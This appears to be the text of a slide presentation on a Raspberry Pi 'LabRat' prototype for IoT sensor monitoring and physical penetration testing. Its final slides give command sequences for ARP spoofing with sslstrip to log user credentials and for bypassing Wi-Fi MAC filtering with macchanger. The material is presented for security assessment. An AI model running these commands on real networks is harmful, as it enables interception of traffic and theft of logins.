The document provides information about using a Raspberry Pi device called the LabRat to perform physical penetration testing and assess Internet of Things (IoT) security. It describes how the LabRat prototype uses sensors to measure temperature, humidity, and transmit data over optical fibers. It also lists penetration testing tools preloaded on the LabRat and demonstrates arp spoofing, MAC spoofing, and packet sniffing attacks. The document aims to show how the LabRat could be used to automatically monitor equipment and send sensor data to cloud services for real-time analytics, as a proof of concept for assessing IoT security.
3. Raspberry Pi as a Physical Backdoor
into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
It’s a device “you can just plug in and do a full-scale
penetration test from start to finish,” Porcello says. “The
enterprise can use stuff like this to do testing more often and
more cheaply than they’re doing it right now.”
-- CEO of Pwnie Express, Dave Porcello
Rogue
APs
Mac Spoofing on
wired Networks
MITM
attacks
5. The LabRat- a Proof of Concept
Prototype
The Raspberry Pi – a 35$ Linux Computer that
powers the LabRat prototype.
To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
6. The LabRat Prototype
Current Setup
10 inch
Capacitive
Touchscreen
Optical Fiber
Tester
Humidity
Sensor Temperature
Sensor
Raspberry-Pi
HDMi-to-LVDS
converter
board
10,000 mAH
Lithium
Polymer
Battery
7. The LabRat Prototype
LM 35 + ADS7841 Temperature Sensor
LM 35
Temperature
SensorADS7841
Analog to
Digital
Converter
9. The LabRat Prototype
Optical Fiber Tester
Optical
Fiber
Holders
Infra-red
LED-Receiver
Combination
to transmit
Messages via
the Fiber
10. Connecting to an IOT Cloud
⁻ https://xively.com/
⁻ Formerly Cosm, Pachube
11. Set up a Cosm (Now Xively) Account
• Register on cosm (xively) and Add Device
• You will Receive an API Key and FEED ID
• Now use the old Cosm eeml library to set up Datastreams from the
Raspberry Pi
12. Setting up the Python Script to send
Data to Xively
Install EEML package from github
sudo apt-get install python-dev
sudo apt-get install python-pip
sudo easy_install -U distribute
sudo pip install rpi.gpio >>>> work with Rpi
GPIO pins
wget -O geekman-python-eeml.tar.gz
https://github.com/geekman/python-
eeml/tarball/master
tar zxvf geekman-python-eeml.tar.gz
cd geekman-python-eeml*
sudo python setup.py install
Set up Python Script
# source eeml package
import eeml
<snip>
API_KEY = 'YOUR_API_KEY'
FEED = YOUR_FEED_ID
API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
13. The LabRat Prototype
Online Real-Time Feed –
Temperature and Humidity
Visit the Real-Time Feed at https://cosm.com/feeds/89297
14. The LabRat Prototype
Python Scripts
1) Python Script to upload the Temperature and Humidity Data to an online Cloud
based feed that displays how the LabRat , in the Future, may do the same with
Sensory Data at Customer Labs to provide Real-Time Analytics.
2) The same Python Script sends an email to lab-admins whenever the Temperature ,
humidity values exceed a pre-decided Threshold
3) Another Python Script to send messages (Binary Data) through an Optical Fiber
using an Infrared LED-Receiver combination and email the data to the user.
The same data may later be uploaded to an inventory management system to
automatically track working equipment and its performance.
16. DEMO
- Arp Spoofing using SSLstrip and arpspoof
- Mac Spoofing using Airmon-ng and
macchanger
- Packet Sniffing using Wireshark
- Other MITM attacks
17. Arp Spoofing and Mac-Spoofing
Attacks
Arp Spoofing
• Set up Port Forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port
80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
• Start Arp spoofing.
Spoof the Gateway
arpspoof -i wlan0 <gateway address>
• Start sslstrip and log User Information
(use –k option to logout users from their
current sessions, forcing them to re-login)
sslstrip -k -l 8080
Mac Spoofing on Wifi
(How to bypass Mac Filtering)
• ifconfig etho down
• airmon-ng start wlan0
• iwlist wlan0 scanning
• airodump-ng –c 6 -a --bssid <mac address
of wireless access point>
--- Gives info of connected devices
• Ifconfig wlan0 down
• Now use machchanger
• Macchanger –m <mac of allowed
devices> wlan0
• Ifconfig wlan0 up